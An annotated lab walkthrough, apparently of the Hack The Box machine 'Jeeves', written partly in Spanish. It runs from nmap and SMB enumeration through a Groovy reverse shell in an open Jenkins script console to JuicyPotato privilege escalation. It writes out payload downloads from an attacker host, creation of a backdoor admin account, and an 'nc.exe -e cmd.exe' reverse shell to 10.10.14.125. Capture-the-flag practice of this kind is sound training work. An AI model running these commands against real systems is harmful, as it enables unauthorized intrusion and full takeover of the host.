# Aggressive first-pass TCP recon of the box.
#   -A                  OS detection, version probes, default scripts, traceroute
#   -p-                 all 65535 TCP ports
#   --script vuln       NSE "vuln" category (contains intrusive checks)
#   --script-timeout 15 per-script cap; a bare number is seconds in nmap
#   -oA output          normal/grepable/XML output as output.{nmap,gnmap,xml}
# Caveat for real engagements: --min-rate 10000 plus the vuln category is very
# loud and can knock over fragile services. Acceptable on a lab host only.
nmap -p- -A --script vuln --script-timeout 15 --min-rate 10000 -v -oA output 10.129.1.109

# Full TCP sweep with default scripts (-sC), service/version detection (-sV)
# and OS fingerprinting (-O, needs raw sockets i.e. root). Saved as jeeves.*.
nmap -p- -sC -sV -O 10.129.1.109 -oA jeeves

# UDP sweep of the entire port range. Note: a full -p- UDP scan is extremely
# slow (closed UDP ports rarely answer and hosts rate-limit ICMP unreachables);
# in practice --top-ports N is used first. Kept at full scope as in the notes.
nmap -p- -sU -O 10.129.1.109 -oA jeeves-udp

# Web server misconfiguration/vuln scan of tcp/80. Nikto fires thousands of
# requests and is trivially detected — fine here, noisy on a monitored target.
nikto -host 10.129.1.109 -port 80

Pasted image 20210816133925.png

# Targeted re-scan of the web ports with default scripts and version probes,
# normal output to ./targeted. Note that the Jenkins instance used later lives
# on tcp/50000, which this targeted scan does not cover — worth adding it once
# the full sweep has revealed it.
nmap -p 80,443 -sC -sV -oN targeted 10.129.1.109

Pasted image 20210828155215.png

# Fingerprint the web stack (server header, frameworks, CMS) on http://10.129.1.109.
# whatweb prepends http:// when given a bare host; only tcp/80 is checked here.
whatweb 10.129.1.109

Pasted image 20210828155518.png

Abrimos http://10.129.1.109 en el navegador para inspeccionar la aplicación web del puerto 80.

Pasted image 20210828155616.png

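# Unauthenticated SMB enumeration of the target.

# Fingerprint the host over SMB (OS build, hostname, domain, signing) — no creds needed.
crackmapexec smb 10.129.1.109

# List shares via a null session (-N: do not prompt for a password).
smbclient -L 10.129.1.109 -N

# Share permissions via a null session. smbmap's host flag is uppercase -H;
# lowercase -h is the help flag, so the original `smbmap -h ...` only printed
# usage and never touched the target. Per smbmap's own usage text, omitting -u
# already implies a null session; 'null' is kept as the notes' convention
# (a non-existent user with an empty password, typically mapped to guest).
smbmap -H 10.129.1.109 -u 'null'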

Pasted image 20210828160036.png

Abrimos http://10.129.1.109:50000/askjeeves/manage: en el puerto 50000 hay una instancia de Jenkins bajo la ruta /askjeeves y, por lo que se ve, la página «Manage Jenkins» es accesible sin autenticarse.

Hacemos clic en «Script Console».

Nos vamos a http://10.129.1.109:50000/askjeeves/script, la consola de scripts de Jenkins: ejecuta código Groovy arbitrario en el servidor con los privilegios del servicio Jenkins, así que basta para obtener una shell inversa.

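# Staging for the file transfer. The smbserver and nc commands both block, so
# run each of the three lines in its own terminal.

# 1) Put nc.exe in the directory that will be shared.
#    NOTE(review): `cp nc.exe .` copies the file onto itself when run from the
#    directory that already holds it (cp refuses with "same file"); the intended
#    source is presumably the local Windows-binaries copy — confirm the path.
cp nc.exe .

# 2) Anonymous SMB share "smbFolder" exporting the current directory
#    (-smb2support is required for modern Windows clients). Anyone who can reach
#    this host can read the share, so serve a throwaway directory holding only
#    the payloads. If the target refuses anonymous access (Windows 10 blocks
#    insecure guest auth by default), add -username/-password and map the share
#    from the target with `net use`. "$PWD" is the quoted equivalent of $(pwd).
python3 /usr/share/doc/python3-impacket/examples/smbserver.py smbFolder "$PWD" -smb2support

# 3) Reverse-shell listener on 443, a port that normally passes egress filtering.
nc -lvnp 443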

Pasted image 20210828160759.png

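# Throwaway web server used to pull tools onto the target (the IWR lines further
# down fetch from 10.10.14.125). It serves the WHOLE current directory with no
# authentication, so start it from a directory that contains only the payloads,
# and bind it to the VPN address instead of 0.0.0.0 so it is not reachable from
# any other network the attacking host sits on. Port 80 requires root.
python3 -m http.server 80 --bind 10.10.14.125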

Pasted image 20210828161738.png

Pasted image 20210828161942.png

Script Groovy de shell inversa para la consola de Jenkins (gist revsh.groovy de frohoff): https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 — antes de ejecutarlo hay que ajustar el host y el puerto del script a los del listener (10.10.14.125:443).

Pasted image 20210828163541.png

Vemos que podemos usar JuicyPotato: requiere que la cuenta tenga SeImpersonatePrivilege o SeAssignPrimaryTokenPrivilege (se comprueba con `whoami /priv`), algo habitual en la cuenta de servicio con la que corre Jenkins.

Pasted image 20210828182323.png

# Listener for the Groovy reverse shell launched from the Jenkins script console.
# -l listen, -v verbose, -n no DNS, -p local port 443.
nc -nlvp 443

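# Same tool-delivery web server as before, restarted for the privesc phase.
# Serves the entire current directory unauthenticated, so run it from a
# payload-only directory and bind to the VPN address (10.10.14.125, the one
# the target is told to fetch from) rather than every interface.
python3 -m http.server 80 --bind 10.10.14.125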

# On the foothold shell: pull nc.exe from the attacker's web server into the
# current directory (IWR is the alias for Invoke-WebRequest). The JuicyPotato
# step below expects it at C:\Windows\Temp\privesc\nc.exe, so run this from
# that directory (created in the next lines) or pass that full path to -OutFile.
Invoke-WebRequest -Uri http://10.10.14.125/nc.exe -OutFile nc.exe

Pasted image 20210828194857.png

REM Working directory for the privesc tooling. C:\Windows\Temp is world-writable,
REM so it is a safe drop location even for a low-privileged service account.
REM Remember to delete the directory during cleanup.
mkdir C:\Windows\Temp\privesc
cd C:\Windows\Temp\privesc

Pasted image 20210828183137.png

# Fetch JuicyPotato into the privesc directory as juicy.exe. Caveat: the stock
# binary is widely signatured, so Defender/AV may quarantine it on download;
# if the file vanishes, that is why.
Invoke-WebRequest -Uri http://10.10.14.125/JuicyPotato.exe -OutFile juicy.exe

Pasted image 20210828185454.png

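REM Abuse SeImpersonatePrivilege to run a command as SYSTEM.
REM   -t *   try both CreateProcessWithTokenW and CreateProcessAsUser
REM   -l     local port for the COM server JuicyPotato listens on
REM   -p/-a  program and its arguments; here cmd.exe adds a new local user
REM Fix: the original had "=t *" (typo), which JuicyPotato does not parse; the
REM flag is "-t". Depending on the Windows build the default CLSID may not work
REM and an explicit -c {CLSID} is needed.
REM Engagement caveat: this creates a real local account with a weak, hard-coded
REM password — a persistence artifact that must be recorded and removed
REM (net user cu3rv0x /delete) once the box is done.
C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net user cu3rv0x password123 /add"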

Pasted image 20210828190031.png

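REM Second SYSTEM-context command: promote the new account to local admin.
REM Fix: "=t *" was a typo for "-t *" (JuicyPotato's token-creation mode flag).
REM Same caveat as the account creation: group membership is a persistence
REM artifact to be reverted during cleanup
REM (net localgroup Administrators cu3rv0x /delete).
C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net localgroup Administrators cu3rv0x /add"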

Pasted image 20210828190513.png

REM Direct SYSTEM reverse shell: JuicyPotato spawns cmd.exe as SYSTEM, which
REM launches nc.exe back to the attacker on 10.10.14.125:443 (the listener on
REM the next line must already be running). nc -e ships a raw cmd.exe over the
REM socket, unencrypted — fine for a lab, visible to any network sensor.
C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\Windows\Temp\privesc\nc.exe -e cmd.exe 10.10.14.125 443"

# Listener on the attacker host that receives the SYSTEM shell from JuicyPotato.
nc -nlvp 443

REM In the SYSTEM shell, go to the Administrator desktop.
cd C:\Users\Administrator\Desktop
REM /r lists NTFS alternate data streams; a plain dir or `type` would only show
REM the decoy hm.txt and miss the hidden stream.
dir /r
REM Read the root flag stored in the ADS hm.txt:root.txt. `type` cannot open a
REM stream by name, but input redirection into `more` can.
more < hm.txt:root.txt

Pasted image 20210828195446.png
